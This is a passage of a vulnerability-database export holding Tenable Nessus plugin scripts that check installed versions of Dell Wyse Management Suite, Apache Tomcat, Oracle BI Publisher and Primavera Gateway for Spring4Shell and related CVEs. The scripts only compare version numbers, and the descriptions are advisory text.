subject to a\n denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they\n can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients\n consuming server certificates - TLS servers consuming client certificates - Hosting providers taking\n certificates or private keys from customers - Certificate authorities parsing certification requests from\n subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that\n use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS\n issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate\n which makes it slightly harder to trigger the infinite loop. However any operation which requires the\n public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-\n signed certificate to trigger the loop during verification of the certificate signature. This issue\n affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the\n 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected\n 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc). (CVE-2022-0778)\n\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution\n (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR\n deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not\n vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be\n other ways to exploit it. (CVE-2022-22965)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.dell.com/support/kbdoc/en-us/000198486/dsa-2022-098-dell-wyse-management-suite-security-update-for-multiple-vulnerabilities\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?beac8880\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Dell Wyse Management Suite 3.6.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Spring Framework Class property RCE (Spring4Shell)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:dell:wyse_management_suite\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"dell_wyse_management_suite_win_installed.nbin\");\n script_require_keys(\"installed_sw/Dell Wyse Management Suite\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\n\nvar app_info = vcf::get_app_info(app:'Dell Wyse Management Suite', win_local:TRUE);\n\nvar constraints = [\n { 'fixed_version' : '3.6.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-01T15:13:27", "description": "The version of Apache Tomcat installed on the remote host is 10.x prior to 10.0.20.\n\n - The simplified implementation of blocking reads and writes introduced in Tomcat 10 and back-ported to Tomcat 9.0.47 onwards exposed a long standing (but extremely hard to trigger) concurrency bug in Apache Tomcat 10.1.0 to 10.1.0-M12, 10.0.0-M1 to 10.0.18, 9.0.0-M1 to 9.0.60 and 8.5.0 to 8.5.77 that could cause client connections to share an Http11Processor instance resulting in responses, or part responses, to be received by the wrong client. (CVE-2021-43980)", "cvss3": {}, "published": "2022-04-01T00:00:00", "type": "nessus", "title": "Apache Tomcat 10.0.0.M1 < 10.0.20 Spring4Shell (CVE-2022-22965) Mitigations", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-43980", "CVE-2022-22965"], "modified": "2023-12-01T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_10_0_20.NASL", "href": "https://www.tenable.com/plugins/nessus/159463", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159463);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/12/01\");\n\n script_cve_id(\"CVE-2021-43980\");\n script_xref(name:\"IAVA\", value:\"2023-A-0534-S\");\n\n script_name(english:\"Apache Tomcat 10.0.0.M1 < 10.0.20 Spring4Shell (CVE-2022-22965) Mitigations\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by a vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is 10.x prior to 10.0.20.\n\n - The simplified implementation of blocking reads and writes introduced in Tomcat 10 and back-ported to\n Tomcat 9.0.47 onwards exposed a long standing (but extremely hard to trigger) concurrency bug in Apache\n Tomcat 10.1.0 to 10.1.0-M12, 10.0.0-M1 to 10.0.18, 9.0.0-M1 to 9.0.60 and 8.5.0 to 8.5.77 that could cause\n client connections to share an Http11Processor instance resulting in responses, or part responses, to be\n received by the wrong client. (CVE-2021-43980)\");\n # https://github.com/apache/tomcat/commit/17f177eeb7df5938f67ef9ea580411b120195f13\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d6ecd284\");\n # https://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.0.20\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?953e1d4d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 10.0.20 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-43980\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"former\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude('tomcat_version.inc');\n\ntomcat_check_version(fixed: '10.0.20', min:'10.0.0.M1', severity:SECURITY_NOTE, granularity_regex: \"^10(\\.0)?$\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-03T17:27:27", "description": "The 5.9.0.0.0 and All Supported Versions versions of Oracle Business Intelligence Enterprise Edition (OAS) installed on the remote host are affected by multiple vulnerabilities as referenced in the July 2022 CPU advisory.\n\n - Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Service Administration UI (JQuery)). The supported version that is affected is 5.9.0.0.0.\n Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data. (CVE-2020-11023)\n\n - Security-in-Depth issue in the Oracle BI Publisher product of Oracle Fusion Middleware (component: Web Service API (Spring Framework)). This vulnerability cannot be exploited in the context of this product.\n (CVE-2022-22965)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-08-17T00:00:00", "type": "nessus", "title": "Oracle Business Intelligence Publisher (OAS) (Jul 2022 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-11023", "CVE-2022-22965"], "modified": "2023-01-18T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:business_intelligence_publisher"], "id": "ORACLE_BI_PUBLISHER_OAS_CPU_JUL_2022.NASL", "href": "https://www.tenable.com/plugins/nessus/164159", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164159);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/18\");\n\n script_cve_id(\"CVE-2020-11023\", \"CVE-2022-22965\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/25\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Oracle Business Intelligence Publisher (OAS) (Jul 2022 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The 5.9.0.0.0 and All Supported Versions versions of Oracle Business Intelligence Enterprise Edition (OAS) installed\non the remote host are affected by multiple vulnerabilities as referenced in the July 2022 CPU advisory.\n\n - Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware\n (component: Service Administration UI (JQuery)). The supported version that is affected is 5.9.0.0.0.\n Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to\n compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction\n from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence\n Enterprise Edition, attacks may significantly impact additional products (scope change). Successful\n attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle\n Business Intelligence Enterprise Edition accessible data as well as unauthorized read access to a subset\n of Oracle Business Intelligence Enterprise Edition accessible data. (CVE-2020-11023)\n\n - Security-in-Depth issue in the Oracle BI Publisher product of Oracle Fusion Middleware (component: Web Service\n API (Spring Framework)). This vulnerability cannot be exploited in the context of this product.\n (CVE-2022-22965)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/docs/tech/security-alerts/cpujul2022cvrf.xml\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpujul2022.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the July 2022 Oracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Spring Framework Class property RCE (Spring4Shell)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:business_intelligence_publisher\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_bi_publisher_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Business Intelligence Publisher\");\n\n exit(0);\n}\n\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::get_app_info(app:'Oracle Business Intelligence Publisher');\n\nvar constraints = [\n # Oracle Analytics Server 5.9\n {'min_version': '12.2.5.9', 'fixed_version': '12.2.5.9.220714', 'patch': '34385848', 'bundle': '34385848'}\n];\n\nvcf::oracle_bi_publisher::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-01T15:12:04", "description": "The version of Apache Tomcat installed on the remote host is 8.x prior to 8.5.78.\n\n - The simplified implementation of blocking reads and writes introduced in Tomcat 10 and back-ported to Tomcat 9.0.47 onwards exposed a long standing (but extremely hard to trigger) concurrency bug in Apache Tomcat 10.1.0 to 10.1.0-M12, 10.0.0-M1 to 10.0.18, 9.0.0-M1 to 9.0.60 and 8.5.0 to 8.5.77 that could cause client connections to share an Http11Processor instance resulting in responses, or part responses, to be received by the wrong client. (CVE-2021-43980)", "cvss3": {}, "published": "2022-04-01T00:00:00", "type": "nessus", "title": "Apache Tomcat 8.x < 8.5.78 Spring4Shell (CVE-2022-22965) Mitigations", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-43980", "CVE-2022-22965"], "modified": "2023-12-01T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_8_5_78.NASL", "href": "https://www.tenable.com/plugins/nessus/159462", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159462);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/12/01\");\n\n script_cve_id(\"CVE-2021-43980\");\n script_xref(name:\"IAVA\", value:\"2023-A-0534-S\");\n\n script_name(english:\"Apache Tomcat 8.x < 8.5.78 Spring4Shell (CVE-2022-22965) Mitigations\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by a vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is 8.x prior to 8.5.78.\n\n - The simplified implementation of blocking reads and writes introduced in Tomcat 10 and back-ported to\n Tomcat 9.0.47 onwards exposed a long standing (but extremely hard to trigger) concurrency bug in Apache\n Tomcat 10.1.0 to 10.1.0-M12, 10.0.0-M1 to 10.0.18, 9.0.0-M1 to 9.0.60 and 8.5.0 to 8.5.77 that could cause\n client connections to share an Http11Processor instance resulting in responses, or part responses, to be\n received by the wrong client. (CVE-2021-43980)\");\n # https://github.com/apache/tomcat/commit/4a00b0c0890538b9d3107eef8f2e0afadd119beb\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c41b6749\");\n # https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.78\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?72f4365d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 8.5.78 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-43980\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"former\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude('tomcat_version.inc');\n\ntomcat_check_version(fixed:'8.5.78', min:'8.0.0', severity:SECURITY_NOTE, granularity_regex: \"^8(\\.[012345])?$\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-01T15:14:31", "description": "The version of Apache Tomcat installed on the remote host is 9.x prior to 9.0.62.\n\n - The simplified implementation of blocking reads and writes introduced in Tomcat 10 and back-ported to Tomcat 9.0.47 onwards exposed a long standing (but extremely hard to trigger) concurrency bug in Apache Tomcat 10.1.0 to 10.1.0-M12, 10.0.0-M1 to 10.0.18, 9.0.0-M1 to 9.0.60 and 8.5.0 to 8.5.77 that could cause client connections to share an Http11Processor instance resulting in responses, or part responses, to be received by the wrong client. (CVE-2021-43980)", "cvss3": {}, "published": "2022-04-01T00:00:00", "type": "nessus", "title": "Apache Tomcat 9.0.0.M1 < 9.0.62 Spring4Shell (CVE-2022-22965) Mitigations", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-43980", "CVE-2022-22965"], "modified": "2023-12-01T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_9_0_62.NASL", "href": "https://www.tenable.com/plugins/nessus/159464", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159464);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/12/01\");\n\n script_cve_id(\"CVE-2021-43980\");\n script_xref(name:\"IAVA\", value:\"2023-A-0534-S\");\n\n script_name(english:\"Apache Tomcat 9.0.0.M1 < 9.0.62 Spring4Shell (CVE-2022-22965) Mitigations\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by a vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is 9.x prior to 9.0.62.\n\n - The simplified implementation of blocking reads and writes introduced in Tomcat 10 and back-ported to\n Tomcat 9.0.47 onwards exposed a long standing (but extremely hard to trigger) concurrency bug in Apache\n Tomcat 10.1.0 to 10.1.0-M12, 10.0.0-M1 to 10.0.18, 9.0.0-M1 to 9.0.60 and 8.5.0 to 8.5.77 that could cause\n client connections to share an Http11Processor instance resulting in responses, or part responses, to be\n received by the wrong client. (CVE-2021-43980)\");\n # https://github.com/apache/tomcat/commit/170e0f792bd18ff031677890ba2fe50eb7a376c1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f8a02181\");\n # https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.62\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a9b73a07\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 9.0.62 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-43980\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"former\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude('tomcat_version.inc');\n\ntomcat_check_version(fixed: '9.0.62', min:'9.0.0.M1', severity:SECURITY_NOTE, granularity_regex: \"^9(\\.0)?$\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-27T15:00:27", "description": "The versions of Primavera Gateway installed on the remote host are affected by multiple vulnerabilities as referenced in the July 2022 CPU advisory.\n\n - Vulnerability in the Primavera Gateway product of Oracle Construction and Engineering (component:\n Admin (jackson-databind)). Supported versions that are affected are 17.12.0-17.12.11, 18.8.0-18.8.14, 19.12.0-19.12.13, 20.12.0-20.12.8 and 21.12.0-21.12.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Primavera Gateway. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Primavera Gateway. (CVE-2020-36518)\n\n - Vulnerability in the Primavera Gateway product of Oracle Construction and Engineering (component:\n Admin (Apache Xerces-J)). Supported versions that are affected are 17.12.0-17.12.11, 18.8.0-18.8.14, 19.12.0-19.12.13 and 20.12.0-20.12.8. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Primavera Gateway. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Primavera Gateway.\n (CVE-2022-23437)\n\n - Security-in-Depth issue in the Primavera Gateway product of Oracle Construction and Engineering (component: Admin (Spring Framework)). This vulnerability cannot be exploited in the context of this product. (CVE-2022-22965)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-21T00:00:00", "type": "nessus", "title": "Oracle Primavera Gateway (Jul 2022 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-36518", "CVE-2022-22965", "CVE-2022-23437"], "modified": "2023-10-24T00:00:00", "cpe": ["cpe:/a:oracle:primavera_gateway"], "id": "ORACLE_PRIMAVERA_GATEWAY_CPU_JUL_2022.NASL", "href": "https://www.tenable.com/plugins/nessus/163328", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163328);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/24\");\n\n script_cve_id(\"CVE-2020-36518\", \"CVE-2022-22965\", \"CVE-2022-23437\");\n script_xref(name:\"IAVA\", value:\"2022-A-0285\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/25\");\n script_xref(name:\"IAVA\", value:\"2023-A-0558\");\n\n script_name(english:\"Oracle Primavera Gateway (Jul 2022 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The versions of Primavera Gateway installed on the remote host are affected by multiple vulnerabilities as referenced in\nthe July 2022 CPU advisory.\n\n - Vulnerability in the Primavera Gateway product of Oracle Construction and Engineering (component:\n Admin (jackson-databind)). Supported versions that are affected are 17.12.0-17.12.11, 18.8.0-18.8.14,\n 19.12.0-19.12.13, 20.12.0-20.12.8 and 21.12.0-21.12.1. Easily exploitable vulnerability allows\n unauthenticated attacker with network access via HTTP to compromise Primavera Gateway. Successful attacks\n of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash\n (complete DOS) of Primavera Gateway. (CVE-2020-36518)\n\n - Vulnerability in the Primavera Gateway product of Oracle Construction and Engineering (component:\n Admin (Apache Xerces-J)). Supported versions that are affected are 17.12.0-17.12.11, 18.8.0-18.8.14,\n 19.12.0-19.12.13 and 20.12.0-20.12.8. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via HTTP to compromise Primavera Gateway. Successful attacks require human interaction\n from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized\n ability to cause a hang or frequently repeatable crash (complete DOS) of Primavera Gateway.\n (CVE-2022-23437)\n\n - Security-in-Depth issue in the Primavera Gateway product of Oracle Construction and Engineering\n (component: Admin (Spring Framework)). This vulnerability cannot be exploited in the context of this\n product. (CVE-2022-22965)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/docs/tech/security-alerts/cpujul2022cvrf.xml\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpujul2022.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the July 2022 Oracle Critical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Spring Framework Class property RCE (Spring4Shell)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:primavera_gateway\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_primavera_gateway.nbin\");\n script_require_keys(\"installed_sw/Oracle Primavera Gateway\");\n script_require_ports(\"Services/www\", 8006);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nget_install_count(app_name:'Oracle Primavera Gateway', exit_if_zero:TRUE);\n\nvar port = get_http_port(default:8006);\n\nvar app_info = vcf::get_app_info(app:'Oracle Primavera Gateway', port:port);\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nvar constraints = [\n { 'min_version' : '17.12.0', 'max_version' : '17.12.11.999999', 'fixed_display' : 'See vendor advisory'},\n { 'min_version' : '18.8.0', 'fixed_version' : '18.8.15' },\n { 'min_version' : '19.12.0', 'fixed_version' : '19.12.14' },\n { 'min_version' : '20.12.0', 'fixed_version' : '20.12.9' },\n { 'min_version' : '21.12.0', 